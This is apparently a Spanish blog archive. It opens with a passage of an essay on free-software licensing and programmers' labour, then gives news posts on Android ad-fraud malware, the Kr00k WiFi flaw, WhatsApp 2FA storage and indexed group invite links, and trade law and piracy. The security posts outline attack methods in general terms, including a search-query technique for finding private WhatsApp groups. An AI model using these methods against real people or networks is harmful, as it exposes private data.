El apoyo corporativo hacia la comunidad de Software Libre y Abierto (FOSS) debe verse contra el trasfondo de un mercado de trabajo restructurado. Durante las últimas décadas, los sociólogos industriales han documentado una tendencia donde la fábrica está perdiendo su anterior estatus como el modelo de producción principal. La producción se vuelve cada vez más descentralizada y dispersa en una red de subcontratistas, trabajadores independientes, esquemas de trabajo en casa y franquicias (McChesney, Wood, & Foster, 1998). Las compañías ahora pueden agregar a las comunidades voluntarias de desarrollo a la lista de formas heterogéneas de contratación de trabajo. O, para decirlo con una frase pegadiza, el trabajo es outsource y opensource. La oportunidad para recortar drásticamente los costos laborales para el mantenimiento de software ha atraído a instituciones estatales, vendedores, proveedores de servicio y manufactureras de hardware hacia el FOSS. Los ahorros que hacen gigantes como IBM, el ejército de EEUU y la ciudad de Munich, para mencionar un par de casos de alto perfil, ha creado el espacio para que firmas de software especializadas vendan productos y servicios de software libre. Este análisis es consistente con la crítica de Tiziana Terranova en la que el involucramiento de trabajo libre se ha vuelto estructural a la economía cultural. Ella protestaba contra los muchos ahelos y reclamos hechos sobre la tendencia al consumo mediático activo, primero celebrada en la disciplina de los estudios culturales desde los ‘80 en adelante y más recientemente actualizada con el hype alrededor de la Web 2.0. En respuesta a estas declaraciones a menudo infundadas, Terranova dijo que el capital siempre ha anticipado al consumidor activo en sus estrategias de negocio (Terranova, 2000). Su argumento provee un correctivo a los aplausos acríticos a la subcultura del fan fiction, la licencia Creative Commons y otras expresiones de ’medios participativos’. No obstante, en mi opinión, los críticos de izquierda como Terranova han estado ansiosos de denunciar la explotación económica del trabajo voluntario y han fallado así en ver el cambio político en potencia que también existe en algunos de esos casos.

La relevancia de mi objeción debe decidirse caso por caso. Mientras concedo que la interactividad de los videojuegos y los esfuerzos voluntarios de escritores de fan fiction probablemente no resulten en ningún cambio político sustancial, la interactividad y el donar de los desarrolladores de software libre no puede describirse con el mismo pincel. Aquí debe tomarse en cuenta que el código de software es regalado conjuntamente con una meta política claramente articulada: hacer del software libre el estándar en computación. Es verdad que este punto de vista no es anti comercial en un sentido concreto. Como el lector probablemente sepa, la Licencia Pública General (GPL) protege el derecho del usuario a correr el software con cualquier propósito, incluido el comercial (Gay, 2002). En la práctica, por supuesto, esta opción está limitada por el hecho de que la GPL también permite que las copias vendidas sean copiadas y distribuidas gratuitamente. Mientras la licencia libre reside perfectamente en un mercado libre idealizado, difícilmente lo sea dentro del mercado existente que presupone siempre los cuasi monopolios y las regulaciones estatales (Polanyi, 2001).

Esto explica de alguna manera por qué la derecha política tiene dos visiones sobre las licencias de software libre. Los autoproclamados libertarians3, como Eric Raymond, ven el crecimiento de los modelos de negocio basados en código abierto como una mejor aproximación al libre mercado. Detrás de esta afirmación descansa un entendimiento del capitalismo como básicamente idéntico a sus instituciones, es decir propiedad privada, libre mercado y contratos. Pero esa mirada desecha otras posibles definiciones de capitalismo que hacen énfasis en el capital como autoexpansión del dinero, o, en otras palabras, en la acumulación. Este último punto de vista es central al análisis que hace Marx del capitalismo, pero también es muy cercano a las preocupaciones de los ‘capitanes de la industria’. Con esto en mente, puede ser interesante notar investigaciones de mercado que señalan que la adopción de aplicaciones de FOSS en negocios está comiéndose los ingresos anuales de vendedores de software propietario en US$60 billones por año. Crucialmente, las pérdidas del mercado de software propietario son desproporcionadas con respecto al tamaño de los nuevos mercados de FOSS, por la simple razón de que mucho de este no se paga.4 De ahí que la oposición al FOSS por parte de sectores de la industria no sea necesariamente una postura equivocada, como generalmente se quiso hacer pasar. Esta oposición alcanzó su clímax en la corte en el caso del Grupo SCO contra vendedores corporativos de GNU/Linux que terminó en 2007. Durante el caso, el oficial ejecutivo del Grupo SCO, Darl McBride, escribió una carta abierta al Congreso de EEUU donde acusaba a sus competidores de ser ingenuos al apoyar las licencias FOSS: ‘A pesar de esto, estamos determinados a llevar estos casos legales hasta el final porque estamos firmes en nuestra creencia de que la difusión incontrolada del software de Código Abierto, bajo la GPL, es una amenaza mucho más seria para nuestro sistema capitalista de lo que las corporaciones estadounidenses creen.’

Por lo menos, estas preocupaciones entre algunas partes de la industria informática muestran que los desarrolladores de software libre no pueden adscribirse como meras víctimas insospechadas de la explotación comercial. Tal vez esté más justificado decir que los hackers, al ofrecer su trabajo libremente, están chantajeando a las corporaciones para que adopten y difundan el modelo de desarrollo de FOSS. Ninguna compañía que responda al imperativo del mercado de reducir costos puede argumentar contra el trabajo libre (libre como en cerveza gratis). Mi hipótesis es que la militancia por las licencias libres puede interpretarse a la luz de la profesión emergente del programador de computadoras. Esta sugerencia está lejos de ser obvia ya que la identidad hacker está atada a la noción de ser un hobbista, o, en otras palabras, un no-profesional, no-empleado. Contradiciendo esta autoimagen, sin embargo, los números dicen que la mayoría de la gente que contribuye a proyectos de software libre está trabajando en la industria informática o se está entrenando para convertirse en profesionales informáticos (Lakhani & Wolf, 2005). Por lo tanto, no sería inverosímil conectar los puntos entre los hackers y el mercado laboral que los espera. En efecto, esta línea de razonamiento ya ha sido intentada en el famoso artículo de Josh Lerner y Jean Tirole (Lerner & Tirole, 2002). Ellos trataron de enmarcar el supuesto altruismo de los desarrolladores de software libre en la presunción de la teoría económica neoclásica acerca del ‘hombre racional económico’. Los dos autores concluyen que los hackers regalan código a cambio de nada para crearse una reputación y mejorar sus chances de ser empleados más tarde. Sin negar que estos casos puedan existir, no estoy de acuerdo con la presunción del individualismo metodológico que sostiene su pensamiento. Cuando digo que las licencias de software libre pueden beneficiar los intereses laborales de los programadores informáticos, no quiero decir que es una estrategia racionalmente calculada o que es una explicación exhaustiva de por qué los hackers licencian su software bajo la GPL. Además, en contraste con Lerner y Tirole, no pensamos que estos intereses laborales se persiguen exclusivamente a través de estrategias individuales. Adicionalmente a mejorar su propia reputación, los hackers individuales contribuyen a cambiar el mercado de trabajo para los programadores como un colectivo.

Suena contraintuitivo que los programadores mejoren su fuerza de negociación vis-à-vis las firmas al regalar su trabajo a empleadores potenciales. Déjenme empezar por regresar a Harry Braverman. Él enfatizó que el mismo diseño de la fábrica ponía al operador de la maquinaria en desventaja. El obrero sólo podía emplear sus calificaciones cuando le daban acceso a la maquinaria. Desafortunadamente, la escala y el modo de organización de la fábrica ya estaban sesgados jerárquicamente. El capitalista tenía una ventaja gracias a la propiedad de las máquinas y los edificios, sin los cuales los obreros no podían emplear sus habilidades. Los únicos pedacitos de negociación que tenían los obreros eran sus calificaciones y su conocimiento íntimo del proceso de producción. Fue así como Braverman explicó también la tendencia de los capitalistas a desarrollar nuevas tecnologías que reducen el trabajo calificado. Lo que pasó desde que Harry Braverman hizo su análisis en los ‘70 es que la fábrica fordista de gran escala se volvió obsoleta en muchos sectores de la economía. Esto es particularmente verdadero para la industria informática. Las herramientas productivas (computadoras, redes de comunicación, algoritmos de software e información) están disponibles en tales cantidades que se han convertido en el estándar común en lugar de ser una ventaja competitiva contra otros propietarios (capitalistas) y un umbral para los no propietarios (obreros). Una horda de sociólogos industriales y filósofos gerenciales han escrito sobre esta tendencia desde principios de los ’80 (Zuboff, 1998). Es un truismo de este cuerpo literario afirmar que los empleados, no el parque fabril, son en la actualidad el recurso más valioso en una corporación moderna. Está afirmación está nublada por la retórica, pero su validez puede probarse contra la adopción de ’acuerdos de no divulgación’ dentro de la industria informática. Es aquí donde se establece que el empleado no tiene permitido divulgar información sensible de la firma. Otro tipo de claúsulas que a veces se incluyen en el contrato de empleo suelen producir el mismo efecto, es decir, prevenir fugas, prohibir al programador trabajar en tareas similares para un competidor después de haber dejado al empleador actual. Estos acuerdos pueden tomarse como testimonios de que el conocimiento y las calificaciones de los programadores se están volviendo cada vez más preciosos para que las firmas quieran controlarlos. Argumentaré que estas prácticas, aunque tienen muy poco que ver con la regulación del copyright, sin embargo apoyan mi afirmación de que las licencias propietarias y libres afectan la posición negociadora de los desarrolladores de software.

La justificación de estos diferentes tipos de acuerdos contractuales es la necesidad de prevenir la fuga de secretos de negocio hacia la competencia. No obstante, como un efecto lateral, previene que los programadores se muevan libremente a otras posiciones similares de su oficio. Dado que el programador se convierte en un especialista en el campo en el que está trabajando, puede hacérsele difícil encontrar trabajo en un puesto distinto. El significado de esta observación se vuelve más claro si se lo contrasta con el estudio etnográfico de Sean O’Riain de un grupo de técnicos de software de una firma informática de Irlanda. Aquí se prueba que es muy difícil para los sindicatos organizar a estos trabajadores. Ya que los trabajos se proveen a destajo, las estrategias colectivas de los sindicatos carecen de agarre. Una de las conclusiones de O’Riain es que la movilidad se convierte en el medio principal por el que los empleados negocian sus condiciones laborales y salarios (O’Riain, 2004). Al tener en cuenta este hecho, el significado de los acuerdos contractuales mencionados arriba debe ser reconsiderado. Las limitaciones que ponen a la capacidad de los empleados a ‘votar con los pies’ significa que la firma regana la ventaja. En cuanto al alcance en que los acuerdos de no divulgación y otras claúsulas son utilizados en la forma maquiavélica que se esboza aquí, es algo que queda por investigar empíricamente. Lo que me interesa en este artículo, no obstante, es que el mismo argumento puede aplicarse a las licencias propietarias en general.

La propiedad intelectual6 también se justifica por la necesidad de las firmas de proteger su conocimiento de los competidores. Una justificación complementaria es que la propiedad intelectual es requerida para que los productores puedan cobrar por la información a los consumidores del mercado. Pero la propiedad intelectual también afecta la relación entre la firma y sus empleados, tema menos discutido. Puede decirse que las licencias propietarias previenen la movilidad de los empleados. Asegura que los conocimientos de los programadores queden encerrados en un estándar propietario del que la firma es dueña. Puede trazarse un paralelo en cómo el obrero depende del parque de maquinarias del que el industrialista es dueño. Sin acceso a la fábrica el trabajador no puede emplear sus habilidades productivamente. En la industria de la programación, como se mencionó anteriormente, muchas de las herramientas con las que trabaja el programador están disponibles como bienes informáticos baratos (computadoras, etc.). De ahí que la compañía no tiene ventaja sobre el trabajador para proveer estas instalaciones. Pero cuando el código fuente está encerrado por el copyright y las patentes de software, se requieren grandes cantidades de capital para acceder a las herramientas de programación. Como consecuencia, la licencia de software garantiza a la compañía una ventaja sobre el trabajadorprogramador. Este razonamiento teorético es tanto más difícil de probar empíricamente que la afirmación hecha antes de que las cláusulas en el contrato de empleo podrían usarse para restringir la movilidad de los trabajadores. Aún más, podría ser en un orden de magnitud superior en importancia para las condiciones de trabajo en el sector informático. En efecto, este aspecto de las licencias propietarias orientado a la producción podría ser tan significativo como las justificaciones oficiales a favor de la regulación de la propiedad intelectual, es decir a favor de regular la relación entre la compañía y sus clientes y competidores. Si mis razonamientos hasta ahora son correctos, entonces la Licencia Pública General debería leerse bajo la misma luz. Fui llevado a este pensamiento cuando leí el estudio autorizado de Glyn Moody sobre el modelo de desarrollo del FOSS. Hace la siguiente observación acerca de las condiciones excepcionales de las compañías especializadas en vender servicios relacionados al software libre:

Porque el ‘producto’ es código abierto, y está disponible libremente, los negocios deben necesariamente basarse alrededor de un tipo distinto de escasez: las capacidades de la gente que escribe y provee ese software.

(Moody, 2001)

En otras palabras, cuando el código fuente se hace disponible públicamente bajo la GPL, las únicas cosas que se mantienen escasas en el mercado son las habilidades que se requieren para emplear productivamente las herramientas de software. Y este recurso es inevitablemente la facultad del ‘trabajo vivo’, para seguir la terminología de Karl Marx. Es así que los programadores pueden obtener una ventaja sobre el empleador cuando están negociando sobre su salario y condiciones laborales. La licencia libre nivela el campo de juego al asegurar que todos tengan acceso al código fuente. Terranova y estudiosos similares están en lo cierto cuando señalan que las compañías multinacionales están en mejor posición para explotar el valor comercial de las aplicaciones de software libre que cualquier programador individual. El ahorro que hace IBM al usar Apache en sus servidores es, medido en números absolutos, muchas veces mayor a los golpes de suerte de cualquier programador que ha contribuido al proyecto. Aún así, en una segunda lectura, el programador podría estar mejor si existiera un mercado de trabajo para desarrolladores de software libre, en comparación a que no hubiere ocupaciones de este tipo disponibles. Al publicar software bajo licencias libres, el hacker individual no solo está mejorando su reputación y expectativa de empleo, como han enfatizado Lerner y Tirole. También contribuye al establecimiento de un mercado de trabajo donde las reglas del juego se han reescrito, para él y para todos los demás de su oficio. Puede interpretarse como una forma de acción colectiva adaptada al tiempo del individualismo rampante.

Queda por verse si el establecimiento de un mercado de trabajo en desarrollo de software libre se traduce en mejores condiciones laborales, salarios más altos y otros beneficios asociados al activismo sindical. Tal hipótesis debe sustanciarse con datos empíricos. Se necesita investigación comparativa entre gente trabajando independientemente como programadores de software libre y aquellos que trabajan con software propietario. Tal comparación no debe, sin embargo, enfocarse en aspectos monetarios. Tanto más importante es el costado subjetivo de la programación. Un ejemplo de esto es el descubrimiento consistente de que los hackers consideran más divertido participar en proyectos de software libre que trabajar con código propietario (Lakhani & Wolf, 2005). Tampoco creemos que las estrategias sindicales escondidas son la única explicación de que los hackers publiquen bajo la GPL. Muy probablemente, la preocupación por las libertades civiles y un ethos antiautoritario dentro de la subcultura hacker sean factores más importantes. Los hackers son un grupo muy heterogéneo para incluirlos a todos en una sola explicación. Pero me atrevo a decir que la expectativa de trabajo merece más atención de la que se le ha dado en la prensa popular y la literatura académica hasta ahora. Aunque no faltan críticas hacia la regulación de la propiedad intelectual, estas objeciones tienden a formularse como una defensa de los derechos del consumidor dentro de la tradición política liberal.

Hay, por supuesto, algunas excepciones dignas de notar. Gente como Eben Moglen, Slavoj Zizek y Richard Barbrook han reaccionado contra la ideología liberal implícita en mucha de la charla acerca de Internet y temas relacionados. Lo han hecho al cortejar la retórica revolucionaria de la Segunda Internacional. Sus ideas son originales y atractivas y a menudo ricas en entendimiento. Sin embargo, la retórica revolucionaria suena extrañamente fuera de lugar cuando se aplica a hackers pragmáticos. Los militantes del software libre podrían estar mejor si buscaran un contrapeso a la hegemonía del liberalismo en la rama reformista del movimiento obrero, es decir en el sindicalismo. Se considera que tal estrategia tendrá más sentido mientras más madure la industria informática. De acuerdo con la línea general de argumentación de Harry Braverman, la profesión de ingeniería de software ya ha sido privada de mucho de su estatus anterior. En efecto, desde los tempranos ‘60, los escritores de revistas de gerenciamiento han llamado repetidamente al subyugamiento de los programadores bajo el mismo régimen fabril que previamente, y en parte a través de la introducción de la maquinaria informática, había sido impuesto a los trabajadores de cuello azul (Dafermos & Söderberg, 2009). Con esta historia en mente me gustaría proponer que la militancia por el software libre, en lugar de caer en la enmienda de libre expresión de la Constitución estadounidense, pueda tomar su credo de la ’Declaración de Derechos Tecnológicos’. Esta declaración fue escrita en 1981 por la Asociación Internacional de Maquinistas en el medio de un conflicto industrial rabioso:

Las nuevas tecnologías de automatización y las ciencias que las sostienen son el producto de [un proceso] mundial de acumulación de conocimiento que duró siglos. De este modo, los trabajadores y sus comunidades tienen el derecho a compartir las decisiones y el provecho sobre la nueva tecnología.

(Shaiken, 1986)

Privacidad de niñxs expuesta por aplicaciones en Android

Publicada el 02/04/2020 - 03/08/2021 por Anonymous Chile

A pesar de la implementación de estrictas medidas de seguridad, múltiples aplicaciones maliciosas logran infiltrarse en Google Play Store, afirman especialistas de un diplomado en ciberseguridad. En esta ocasión, se ha reportado la detección de al menos 56 apps maliciosas, descargadas por cerca de 1.7 millones de usuarios, muchos de ellos niños.

Estas eran apps sencillas (juegos para móvil, filtros, guía de horóscopos, entre otros servicios) desarrolladas por compañías casi desconocidas.

Las aplicaciones identificadas estaban infectadas con Tekya, una variante de malware empleado para generar clics fraudulentos en publicidad controlada por Facebook, Google, AdMob, entre otras. Este malware imita la conducta de un usuario legítimo para evitar que las herramientas anti malware y las compañías que colocan estos anuncios identifiquen las acciones anómalas.

Acorde a los instructores del diplomado en ciberseguridad las apps maliciosas lograron esquivar la detección de herramientas como Google Play Protect y la plataforma Virus Total. Finalmente, el malware fue localizado por un equipo de investigadores de Check Point, quienes reportaron que al menos la mitad de estas aplicaciones, enfocadas en el público infantil, contenían el malware Tekya en su código. Google ya ha eliminado estas aplicaciones de Play Store.

En su reporte, los expertos de Check Point también destacan la dificultad para mantener esta plataforma completamente a salvo de amenazas cibernéticas: “Existen alrededor de 3 millones de apps disponibles en Google Play, y cada día se añaden decenas, o incluso cientos más. Los usuarios deben verificar el perfil de los desarrolladores antes de instalar una nueva app”.

Los expertos del diplomado en ciberseguridad mencionan que los actores de amenazas evitan la detección empleando el código nativo de Android, que generalmente emplea los lenguajes de programación C y C ++, además del uso de Java para implementar la lógica.

Aunque los dispositivos Android suelen desinstalar de forma automática las aplicaciones que Google identifica como maliciosas, este mecanismo no siempre responde como debería, por lo que la compañía recomienda a los usuarios verificar que sus aplicaciones sean reconocidas como legítimas.

Recientemente, el Instituto Internacional de Seguridad Cibernética (IICS) reveló la presencia de una app maliciosa en Play Store, afirmando que ya había sido descargada más de 700 mil veces. Esta app estaba infectada con un malware conocido como Android.Circle.1, y era usada con el fin de infestar el dispositivo afectado con anuncios invasivos.

Vulnerabilidad en redes inalámbricas afecta millones de dispositivos

Publicada el 02/04/2020 - 03/08/2021 por Anonymous Chile

Miles de millones de dispositivos con WiFi se han visto afectados por una vulnerabilidad, llamada Kr00k, que permite a un atacante descifrar información sensible enviada a través del aire. Entre los chips afectados hay varios de Cypress Semiconductor y Broadcom, y afecta a dispositivos como móviles, tablets y reproductores Android, iPhone, iPad, Mac, Amazon Echo, Kindle, Raspberry Pi 3, y routers de Asus y Huawei que usen conexiones WiFi WPA2.

ESET, la compañía que ha descubierto la vulnerabilidad, afirma que la vulnerabilidad, con código CVE-2019-15126, afecta a los chips de ambas compañías, y que usan miles de millones de dispositivos en la actualidad. Los fabricantes ya han lanzado parches para solucionarla, pero es difícil llevar un seguimiento de cuántos han instalado los parches. De hecho, muchos de los dispositivos afectados no llegan a recibir un parche nunca.

El fallo afecta a aún más dispositivos de los que tienen el chip, ya que, si por ejemplo tenemos un router con este chip, pero nuestro móvil usa un chip que no está afectado, las comunicaciones enviadas entre ambos dispositivos seguirán siendo vulnerables al ataque.

La vulnerabilidad ocurre cuando un dispositivo se desvincula de un punto de acceso WiFi. Si uno de los dos dispositivos es vulnerable, Kr00k introducirá datos no enviados en el búfer y los transmitirá por aire. Así, en lugar de cifrar los datos con la clave de la sesión negociada anteriormente y usada en la conexión, los dispositivos vulnerables usarán una clave hecha sólo de ceros, permitiendo descifrar todos los datos de la transmisión.

La desvinculación entre dispositivos ocurre constantemente, ya sea cuando nos alejamos de casa, ponemos el modo avión, cambios de punto de acceso, o simplemente apagamos el WiFi del móvil. Si hay un hacker cerca de nuestra red, éstos pueden enviar paquetes de desvinculación a cualquier dispositivo vulnerable, los cuales no están cifrados y no requieren autenticación. Así, pueden desconectar nuestro móvil del WiFi a placer, y a partir de ahí llevar a cabo el ataque, capturando y descifrando todos los datos enviados.

Por “suerte”, el ataque ha de realizar varias de estas desvinculaciones para obtener cantidades de datos importantes, ya que con cada desvinculación sólo pueden obtener kilobytes de datos. Además, los ataques serían fáciles de detectar por el usuario si viera que el WiFi no para de conectarse y desconectarse.

Dispositivos WiFi afectados por Kr00k

Entre los dispositivos que han encontrado vulnerables se encuentran:

Amazon Echo 2ª generación
Amazon Kindle 8ª generación
Apple iPad mini 2
Apple iPhone 6, 6S, 8, XR
Apple MacBook Air Retina 13 pulgadas (2018)
Google Nexus 5
Google Nexus 6
Google Nexus 6S
Raspberry Pi 3
Samsung Galaxy S4 GT-I9505
Samsung Galaxy S8
Xiaomi Redmi 3S
Asus RT-N12
Huawei B612S-25d
Huawei EchoLife HG8245H
Huawei E5577Cs-321

Estos cuatro últimos son routers, y como vemos en el caso de los móviles, muchos han dejado ya de recibir parches. Apple parcheó las vulnerabilidades en macOS y en iOS el pasado mes de octubre. Windows 10 y Android también tienen sus respectivos parches. Aunque en el listado salgan esos dispositivos donde han confirmado que la vulnerabilidad funciona, puede haber otros muchos afectados en los que no la han probado.

Más allá de los chips de Broadcom y Cypress, los investigadores hicieron pruebas en chips de Qualcomm, Realtek, Ralink y Mediatek, y no encontraron las vulnerabilidades, por lo que son seguros.

Un truco para evitar verse afectado por la vulnerabilidad si nuestro dispositivo ya no recibe actualizaciones de seguridad es usar siempre conexiones por HTTPS, tener DNS por HTTPS, o directamente utilizar una VPN, aunque esto no nos protege ante las desconexiones, pero sí ante el posible robo de datos.

La reforma constitucional y el Derecho Internacional Económico

Publicada el 01/04/2020 - 03/08/2021 por Anonymous Chile

Frente a la posible reforma constitucional, la actitud hacia las obligaciones internacionales en materia económica debe ser de prudencia, no de aprensión. Sugerir que los cambios que desea una parte importante de la sociedad implican violentar estas obligaciones –como se deduce de una reciente columna del abogado Jean Pierre Matus– dificulta el debate y, además, es equivocado.

Tomemos la membresía de Chile en la OCDE. En este organismo existen países muy diversos en tres temas claves para la agenda constitucional: salud, educación y pensiones. Hay países que tienen un sistema de salud privado y una educación universitaria muy accesible, como es el caso de Suiza. También hay países con educación universitaria costosa, como el Reino Unido, que sin embargo tiene un sistema de salud universal: el NHS. En Dinamarca, la salud y la educación son gratuitas. Estos tres países tienen sistemas de pensiones diferentes.

Los Tratados de Libre Comercio y otros acuerdos en materia comercial y económica, por otro lado, tienen reglas sobre diversas materias. Estas incluyen normas técnicas y fitosanitarias, sobre servicios, propiedad intelectual, inversiones y otros. Es cierto que estas reglas pueden obstaculizar algunas reformas, pero como lo demuestra la práctica las reformas son posibles.

Luego de terminar con el apartheid, Sudáfrica implementó una serie de reformas en el marco del Black Economic Empowerment. Algunas de estas reformas fueron criticadas por inversores extranjeros, que demandaron a ese país en un arbitraje inversor-Estado. Este arbitraje, no obstante, no llegó a culminarse porque los inversores extranjeros abandonaron el caso. La presión internacional fue fundamental para que ellos desistieran de su demanda.

Otro tema controvertido es la relación entre la salud pública y el Acuerdo sobre los Aspectos de los Derechos de Propiedad Intelectual relacionados con el Comercio (ADPIC). Nuevamente, la práctica muestra como Brasil, Sudáfrica y otros Estados reclamaron y consiguieron una interpretación que facilita las licencias obligatorias para medicamentos. El ADPIC limita algunas políticas, pero también ofrece un amplio margen para medidas de salud pública, como reconoce el South Centre, un organismo experto en la materia.

Por último, los tratados de libre comercio pueden renegociarse. Los Estados Unidos, Canadá y México recientemente renegociaron el Tratado de Libre Comercio de América del Norte (TLCAN), dando lugar al nuevo T-MEC que incorpora cambios significativos.

Desde el auge de los tratados de libre comercio, en la década de los noventa, los tiempos han cambiado mucho. Las preferencias de las sociedades se han modificado, y las promesas del libre comercio y las inversiones extranjeras no se han cumplido. El malestar con la globalización en los Estados Unidos, Europa, América Latina y otras partes del mundo es uno de los grandes temas de la década que comienza.

Nada de lo dicho significa que las obligaciones internacionales en materia económica no son relevantes. Pero el principio no debe ser la aprensión, o la falsa premisa de que es difícil o imposible cambiar a causa de estas obligaciones. Los tratados internacionales en materia económica son flexibles, pueden reinterpretarse y también renegociarse. Las renegociaciones son difíciles pero, en el mundo de hoy, son cada vez más comunes. Las reformas a implementarse en Chile, entonces, deben ser diseñadas con conocimiento de derecho internacional económico, con el debate necesario y asegurándose que la implementación sea adecuada. Lo importante es incluir este tema en la agenda constitucional.

Fallo en WhatsApp permite hackear códigos 2FA

Publicada el 31/03/2020 - 03/08/2021 por Anonymous Chile

Cualquier plataforma conectada a Internet está expuesta al hacking, incluso si se implementan las prácticas de seguridad más recomendadas, aseguran expertos de un curso para hackear celulares. Hace un par de años, WhatsApp lanzó un mecanismo de autenticación de dos factores (2FA) para proporcionar una capa de seguridad adicional para sus usuarios.

Un grupo de investigadores reveló recientemente el hallazgo de una nueva vulnerabilidad en las versiones de WhatsApp para iOS y Android que, de ser explotada, podría permitir a los actores de amenazas obtener el código de acceso 2FA enviado por la compañía, el cual está almacenado en texto sin cifrar.

Cabe mencionar que esta no es la primera ocasión en la que se descubre una seria falla en la seguridad de la plataforma de mensajería, empleada por cientos de millones de personas en todo el mundo.

Acorde a los instructores del curso para hackear celulares, la única protección con la que cuenta este código es que está almacenado en un entorno sandbox, por lo que no es posible que aplicaciones de terceros puedan acceder a esta información, además de que la compañía no almacena este código en las copias de seguridad. No obstante, el hecho de que el código se almacene en texto sin cifrar es una deficiente práctica de seguridad.

A continuación, se muestra cómo WhatsApp almacena la contraseña de 2FA en texto simple. También es posible apreciar que los archivos son almacenados en un contenedor privado.

Los expertos del curso para hackear celulares señalan que esta clave 2FA también es visible en dispositivos Android rooteados, por lo que otras aplicaciones con permisos de root podrían acceder a este código.

Una aplicación de terceros que pudiera acceder a este código aún requeriría de la obtención de un código PIN de seis dígitos enviado al número de teléfono del usuario para comprometer completamente su cuenta, por lo que la posibilidad de explotar esta falla de seguridad con fines maliciosos es reducida de forma considerable.

A pesar de que los usuarios no están ante un peligro inminente, el Instituto Internacional de Seguridad Cibernética (IICS) recomienda a WhatsApp no almacenar esta información en texto sin cifrar para eliminar completamente cualquier riesgo para los usuarios y sus cuentas en la aplicación de mensajería.

Whatsapp expone enlaces de grupos a los motores de búsqueda

Publicada el 31/03/2020 - 03/08/2021 por Anonymous Chile

Al igual que con otras plataformas de mensajería, los chats grupales de WhatsApp son una forma popular de comunicarse con la familia o grupos de amigos, colegas o extraños de Internet. Los usuarios pueden invitar a otros a grupos privados con la función «Invitar al grupo a través de un enlace» y luego compartir ese enlace de la forma que deseen. Si esos enlaces de invitación se comparten en línea, parece que es alarmantemente fácil encontrarlos con una simple consulta en un motor de búsqueda.

La función «Invitar a un grupo a través de un enlace» permite que Google indexe a los grupos y, por lo general, queden disponibles en Internet. Con algunos términos de búsqueda comodín (dorks), pueden encontrarse fácilmente algunos.

Este defecto de diseño fue reportado por primera vez por el periodista Jordan Wildon en Twitter. Descubrió que Google estaba indexando las URL de los grupos y que se podían encontrar con los términos de búsqueda correctos. Los enlaces de chat grupal utilizan la URL base «chat.whatsapp.com», que se puede encontrar en Google con el modificador «site:».

Jane Manchun Wong, conocida por sus aplicaciones de ingeniería inversa, atrajo más la atención sobre la situación. Encontró que Google tiene más de 470.000 resultados al hacer una simple búsqueda de «chat.whatsapp.com». Muchos de estos resultados son invitaciones para grupos privados. Una vez que un usuario se une a un grupo, puede ver a todos los participantes y sus números de teléfono. Obviamente, este es un problema de privacidad bastante grande, ya que algunos de los grupos que hay son personas con las que quizás no quiera asociarse públicamente.

Danny Sullivan, el enlace de búsqueda pública de Google, tuiteó sobre la situación y dijo: «Los motores de búsqueda como Google y otros enumeran páginas de la web abierta. Eso es lo que está pasando aquí. No es diferente a cualquier caso en el que un sitio permita que las URL se enumeren públicamente». Continúa diciendo que existen herramientas para los webmasters para evitar que el contenido aparezca en los resultados de búsqueda, lo que WhatsApp claramente necesita hacer para proteger a los usuarios de estos grupos.

Esto no es culpa de Google ni de ningún otro motor de búsqueda. Como señalaron Jane y Danny, esto se debe a la falta de previsión por parte de WhatsApp. Deberían estar usando la metaetiqueta «noindex» o «norobots.txt» para excluir las páginas de invitación de aparecer en los motores de búsqueda.

Un portavoz de WhatsApp ha publicado la siguiente declaración a Vice: Los administradores de grupo en los grupos de WhatsApp pueden invitar a cualquier usuario de WhatsApp a unirse a ese grupo compartiendo un enlace que han generado. Al igual que todo el contenido que se comparte en canales públicos de búsqueda, otros usuarios de WhatsApp pueden encontrar enlaces de invitación que se publican en Internet. Los enlaces que los usuarios desean compartir en privado con personas que conocen y en las que confían no deben publicarse en un sitio web de acceso público.

WhatsApp está diciendo que los enlaces compartidos públicamente en Internet efectivamente se pueden encontrar. Se pueden descubrir fácilmente miles de enlaces de invitación de chat grupal porque WhatsApp se niega a hacer algo para evitar que los motores de búsqueda los indexen. Las personas no deberían compartir estas URL en línea, pero WhatsApp podría resolver el problema para que no sean tan fáciles de encontrar.

Piratería y Software Libre

Publicada el 30/03/2020 - 03/08/2021 por Anonymous Chile

En “Por qué el software no debería tener dueños” (Stallman, 2010), Richard Stallman explica que, si un amigo te pide una pieza de software y la licencia de ese software te impide compartirlo, vas a tener que elegir entre ser un mal amigo o violar la licencia del software. Stallman sugiere que los usuarios tendrán que elegir el menor de dos males y elegirán violar la licencia. Enfatiza que es injusto pedir a un usuario que realice tal elección.

En los últimos años, los partidos piratas (Wikipedia, 2011) han crecido a través del mundo desarrollado. Por supuesto, la piratería es el medio principal de distribuir medios entre todos los demás. Los militantes del acceso a la información se han juntado y organizado bajo la bandera ’pirata’, representando la elección de compartir con amigos sobre el cumplimiento de los términos de las licencias.

Tanto el movimiento del Software Libre y Abierto como el de la Cultura Libre parecen tener reacciones confusas y contradictorias a esto. Por un lado, los mayores proponentes de varios partidos piratas (Partei, 2006, ppuk-copyright) son también militantes por el Software Libre y varios partidos piratas han hecho de la militancia por el Software Libre uno de los componentes de sus plataformas políticas. La clara oposición del Partido Pirata a las patentes del software y el DRM resuena junto a la de las comunidades del Software y de la Cultura libres. Por otro lado, líderes del movimiento del Software Libre, incluyendo a Stallman, nos han prevenido acerca de las políticas ’piratas’ anti-copyright (Stallman, 2009). Líderes de la Cultura Libre, como Lawrence Lessig, han repetida y vociferadamente denunciado la piratería (Lessig, 2008b, 2008a, 2010), hasta tratado la sugerencia de una asociación con la piratería como una afronta, y se han distanciado sistemáticamente de ella.

¿Deberían los militantes del Software y la Cultura libres aceptar a los piratas como camaradas de armas o condenarlos? ¿Debemos elegir entre estar con los piratas o contra ellos? Nuestras comunidades parecen no haber podido articular un consenso claro y consistente.

Se cree que, inintuitivamente, si se toma una fuerte posición de principios (Hill, 2009) a favor de la libertad de la información y se distingue entre los principios y las tácticas, es posible llegar a un ’término medio’ más matizado en respuesta a la piratería. A la luz de un convencimiento de que los usuarios deben poder compartir información podemos concluir que no hay nada éticamente malo con la piratería. Las licencias tienen el poder de la ley pero están protegidas por leyes de ’propiedad intelectual’ injustas. Habiendo dicho esto, los principios no son la única razón por la que los activistas deciden hacer las cosas. Muchos intentos políticos son malas ideas no porque estén mal, sino porque no van a funcionar y tienen efectos negativos. Las tácticas importan también. Aunque no haya nada éticamente malo con la piratería desde la perspectiva del software o la cultura libres, todavía puede ser una mala idea. Hay al menos tres razones tácticas que pueden motivar al software y la cultura libres a no apoyar la piratería o a participar en movimientos y políticas pro-piratería.

